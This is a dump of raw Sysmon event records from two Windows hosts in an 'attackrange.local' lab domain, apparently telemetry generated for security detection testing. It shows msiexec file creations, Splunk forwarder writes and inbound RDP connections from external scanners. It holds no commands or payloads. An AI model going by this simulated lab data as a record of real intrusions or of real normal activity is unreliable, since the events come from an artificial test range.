AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\H6GX73S4CQ\ReachFramework.ni.dll.auxMD5=8E0B5273E15B0F56E9333938DF76CA3E,SHA256=4F360EF24EA7F0823D897C9611EADD08300C981C161C1B36AD8CEE21CED8EA41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072905Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:23.422{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\H6GX73S4CQ\ReachFramework.ni.dllMD5=E069FAA5ED61AE659FFF54862D342EAF,SHA256=51516AF2F20913DCE266088B51C10A25A23950B680553277955B6DA6C62D8001,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072904Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:23.266{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\GXZFSB4FLE\System.Configuration.ni.dll.auxMD5=EA64890856D84601CF0F15F8F925876E,SHA256=BC3CBF89983AF4F608D30A0FA34FB62C3F716BF7B77DAF65A806DD567D4EEA24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072903Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:23.266{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\GXZFSB4FLE\System.Configuration.ni.dllMD5=7C4B6B49CBB1C3DBAA853BD4E51B378B,SHA256=91DE196C16599FE3164E02F877E74D5F2526AC8C0B8DFDDD3A07D072654E8E98,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072902Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:23.219{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\GW3Z3ACCXR\System.Web.Extensions.ni.dll.auxMD5=47F23732071CE372B9243110B56A1313,SHA256=7F15665D9BB1AE85C095B19115B0C67B3A4EB52758FE0ECBDC13C288723E79ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072901Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:23.219{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\GW3Z3ACCXR\System.Web.Extensions.ni.dllMD5=33ABBACBEBD570DF9FC4774D00275EA4,SHA256=378ED5CA79D9890DEFA965E9591B916A35B60E1B8D7EB39CC9D4E88FDB6FD52E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072900Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:23.141{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\GGTS06TXPC\System.Management.ni.dll.auxMD5=C1BFBA62286B37FE0040708E215BF84E,SHA256=03F8237BF012F6F2808F96D34F1F239C6853F03E0260BB8CEC7971ECB0B3BC53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072899Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:23.125{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\GGTS06TXPC\System.Management.ni.dllMD5=3C5C4EC7108C741BC98B0C4DDD57674E,SHA256=9D2273BEADA4D0C7D2CE64B81771586505790835694F2984E7BBE37F0BAAEC05,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072898Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:23.109{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\G7Z8TQPLC6\System.Numerics.ni.dll.auxMD5=EB049ABA5517841C734115079F8BD603,SHA256=2877312EFE8951A61700B5A8981F42E506060308E5D402F8E5FC7F879EDAC5FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072897Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:23.109{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\G7Z8TQPLC6\System.Numerics.ni.dllMD5=D282D2158C31BBF5B31EE855F7B15EC7,SHA256=72E1074D33DC23AB1D680257B353F3C2210E1C9095D3284570DC678FA3E93907,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072896Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:23.109{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\G13O28JG3B\System.Transactions.ni.dll.auxMD5=0D6387AC9B68EE76DD1AE4111FEB0842,SHA256=F87542DCD5903BA1C034524739A790E9D3B1B336B227F243592B34110620F13B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072895Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:23.109{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\G13O28JG3B\System.Transactions.ni.dllMD5=847A385B1E0000FE8E4F31BFD457AEA4,SHA256=70ABFFB679617A8B62208F4BD26F1DAC0C5ADF6FD62EB9C81BE6A249613E340C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072894Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:23.094{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\FY65QPL515\System.Web.ni.dll.auxMD5=19FB3A849C52671A5AB8AB8EFABC318A,SHA256=799F28D0CC5031F28563E4C53CCF7B1B088589E6908C1961EA9ECB296B368AD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072893Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:23.094{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\FY65QPL515\System.Web.ni.dllMD5=0EA90B6E8B779F335E221C1AB127E1F7,SHA256=7F19FC08816DA636C530A17A011AEB221A83A8785ECA95E3530458B296F79C66,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000072892Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:21.316{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-19216-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000072891Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:21.138{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-24676-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000072890Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:21.043{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com56282-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000050008Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:22.123{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com58820-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050007Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:22.096{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com62883-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050006Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:21.781{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52510-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000050005Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:21.057{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-61413-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050004Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:23.735{85C0FFC9-B85C-607E-9700-00000000BB01}3076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=F985E1E51BD4FEB45E4931E1523E80EA,SHA256=E168C793E8F8BB7D1EAC66F2B963AAC5E0DD0FE2CCEBAB9CCFC61E8C70CE4293,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050003Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:23.454{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=604D90E52AA3F3E4393E67BF7AD39066,SHA256=41A295B3D74C6EAAF857930A295D349577FB567E51E6F97FF785C19CC184AB4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050002Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:23.017{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53A0B2CF6E55230D285520A7324BE43B,SHA256=B41BB7EBC66B869A8D6132F0D604FA176DF2C237F1DC86DAE72445937D743EA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072917Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:24.859{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\I36AMTGQTY\System.Core.ni.dll.auxMD5=0FBFE5BF85572E5EAF926378B1D5A6CD,SHA256=365F134ED4CC28065A185B62435A5E607FC545BF4555821AF933C4BF882EEC27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072916Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:24.859{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\I36AMTGQTY\System.Core.ni.dllMD5=B2E70F3704B5B64DC37B04E4C1C9CB25,SHA256=E91FFA95C7EABAFFCA0D419C77925EDD1D4F7901C520B962CAC5FBF4547830C3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072915Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:24.641{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\I0ZG5LI9D8\PresentationFramework.ni.dll.auxMD5=5D398136B7EF718AEDDC2B292F49FA7E,SHA256=DA7E0528132F730C1206B617B914AC2DEF37E27A63759CEE6CDF56EC61E54650,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072914Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:24.641{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\I0ZG5LI9D8\PresentationFramework.ni.dllMD5=78D04F023FC7CE7C0509605E674FB7EA,SHA256=35B483E27DF57BD7F2025E69EFC2C721C552C158D7D1DCB8398CF7DE3ECE8DA7,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072913Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:24.234{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\HOKOV5H7CS\System.Windows.Forms.ni.dll.auxMD5=52BD50ED4F47D2E2F29961EE0EFE38D1,SHA256=4805A52F8ED7EF89DC686E2DCC6B06E6CE63E763917F8B1AB9012712243523C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072912Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:24.234{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\HOKOV5H7CS\System.Windows.Forms.ni.dllMD5=4B85DF10FF589C916B17F5D590D44713,SHA256=696E3043EC7372A00BC16ADBD6A77EC067A177538A498EFE96BE7549B2A264EE,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000072911Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:22.662{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-28771-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000072910Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:22.654{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com63337-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000072909Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:22.272{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57519-false10.0.1.12-8000- 354300x800000000000000050010Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:22.750{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-49468-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050009Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:24.048{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39E1D78CE58A0BA61B523854FAEC6355,SHA256=2ED7508B686A5A6963B93CD882A9CE7536096501B6940E4644744A0FCD462229,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072932Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:25.734{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\IGF1HM5791\System.Xml.ni.dll.auxMD5=1D30F3B92D5134B2A30A5F0DE1C91264,SHA256=E0F0F10CD976EFE6069FBD50986EB409295BB110D1848EB1C721DB525CA03F10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072931Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:25.734{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\IGF1HM5791\System.Xml.ni.dllMD5=D7943DFED3B022B1D45A86E115CA587A,SHA256=0CC48205999BBF650571D739A7CCD2436528FA0DBE507E46F61D53028F5246CE,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072930Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:25.547{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\IFZ4XBDHAS\System.ni.dll.auxMD5=EDC52D59BDF2DFBB195AE6DD2A938270,SHA256=ED816F3F4B2D458DDAC0306AFA5B9D2C080734BC035126054DF76141F90910C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072929Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:25.547{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\IFZ4XBDHAS\System.ni.dllMD5=D71B052A790A577400CB572A7D4CB69B,SHA256=DE2BE5C6691862A5223BDFEFEE00F33FB6C7A5B2F6DC68124E44EB42D8D3B709,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072928Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:25.516{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=8AD2D3E06EAA911559C5AF4F991F2AB2,SHA256=6761A39B8DB3DE4AD33B596E00217DE052A09B951B252CE35303D7E9D40975AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072927Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:25.516{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DB995CF877BA15D08F1A7D861A6C283A,SHA256=59CA4A7047C83DE5EB4D583B0A6AC502A75C93D8CAF01D09DA203CF8A2CB08DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072926Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:25.406{A7A01FEF-B626-607E-1000-00000000BB01}1168NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=D03458740A97A60F4AE1A8FF6E1977AB,SHA256=3CE13D9D1551FDBC967BD670364CA3FAAD792463272225C9AA550312CBE1B5F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072925Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:25.297{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\IFIZWTS6QK\System.ServiceProcess.ni.dll.auxMD5=5F1B10CF85EC7771100106A8D294DE9A,SHA256=C39E9DA9D01E465D0018CD0F38C4679CA99D3D2DE577B40FADE4BBD70AAEB914,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072924Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:25.297{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\IFIZWTS6QK\System.ServiceProcess.ni.dllMD5=B5478080DC0565883D13ED0AEB88AE0D,SHA256=7133B1C2FE4870AB945EFDC8A8846A7C8F3F50F9C86784C3B9E0EF0CCBE62418,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072923Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:25.281{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\IFE8ASBLJ1\System.Core.ni.dll.auxMD5=870A3297397BA0FE7218B9C05CCD1E5E,SHA256=1EB4BF3E6FB4775A6F7AEE5392F452B0E673B4F5C6E539E2C40414946C7BDEFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072922Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:25.281{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\IFE8ASBLJ1\System.Core.ni.dllMD5=8326A23004BDB577F7A7127273214004,SHA256=F00785989931F0C8E944A6A8DD2D28F4F623EF4B9CDCBFDA3C1ADE17FDF1D9F8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072921Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:25.094{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\I4ZC1WO7UV\Microsoft.CSharp.ni.dll.auxMD5=DD0CEB4EA439E19B10174EF6765C98E1,SHA256=75AE3D143A5C54005FD62BDD0961B822893FA6950D9511F46D3F0FBA167B910E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072920Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:25.094{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\I4ZC1WO7UV\Microsoft.CSharp.ni.dllMD5=B532D8EE87DC58C1B47163040764B56F,SHA256=D21ED6A4DE422B51B01FB33ABE0B8A7E05ECB33DE3565C080BC7F36531BA0ED3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072919Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:25.047{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\I4EZ579ZE9\System.Data.ni.dll.auxMD5=DF0F1C0FA81E796AC70A2D94A073E9CC,SHA256=0845B10F66BEDD2065E719081C9D63342AA232BF92EA04790F2F4B5CAD7C0E9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072918Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:25.047{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\I4EZ579ZE9\System.Data.ni.dllMD5=3EE0E72D8E3B1539DC08D97CEEA7108A,SHA256=255AC27EC0628CD1C208742807B816562D279688C1DA873A889FB54230281B6F,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000050013Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:23.328{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52511-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x800000000000000050012Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:25.407{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=939D01D222FB5E320C941647CAB4E4BF,SHA256=B584B8283278518760B716FCD0AD9FEB99A3EA377DE61D34BC306F94030E394B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050011Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:25.079{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=900E63E3E66B763E718EB05012322CA9,SHA256=23E18DE4F568F7A154D2B977B5E764A2547D4DDE7B6FAC6E2E9091A3CF620632,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072962Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.859{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\JMYST3KO7Z\System.ni.dll.auxMD5=2757D2358B8F06C9205162B01ADD8563,SHA256=7DA6F03A2961DB5296E81D1186309960BE931C942AD7F3BD2FE11BD1F40F0B40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072961Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.859{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\JMYST3KO7Z\System.ni.dllMD5=897FC7C6AA44F5EBF88139492F41E46A,SHA256=D365B32B72989F4BAED79A536394AB7D040B9A920F89897DD5BF77264F8A6792,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072960Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.688{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\JHYA271NNM\System.Numerics.ni.dll.auxMD5=6D550B69BDC7D89EC2E3554A3DDB4667,SHA256=7CF8E63A66C6685A48A43466D8842DE966699265AF5DDA14CF5EE7EA2398B019,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072959Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.688{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\JHYA271NNM\System.Numerics.ni.dllMD5=AF5901179DD8427F1BCE805FC1C60542,SHA256=976A8BC3D65758BF022E26BC0F8BEC1B908D58665A99B6DB45FD5004809E16C5,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072958Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.672{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\JBBR8BELHO\System.Web.ni.dll.auxMD5=0957F4DA581E02FF9C1610899338F081,SHA256=149C4DEBA1B8BC2221AE4E9375A4D096B7FA043FD251BF9127A286B9B5C870AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000072957Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.672{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\temp\JBBR8BELHO\System.Web.ni.dllMD5=518A18816F2AD45C37A53A4D5AB36114,SHA256=3978A170D2047F55D0D22592D4D67EFDBD4AD29E48606367706C9BE4214F84FA,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000072956Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:26.531{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B15EA42DBBB7DA2941559E0B3184491,SHA256=1389F9995B012D8C380D90424FAF9C6935E122500B794A06FCBE1C49C2349ECD,IMPHASH=00000000000000000000000000000000falsetrue 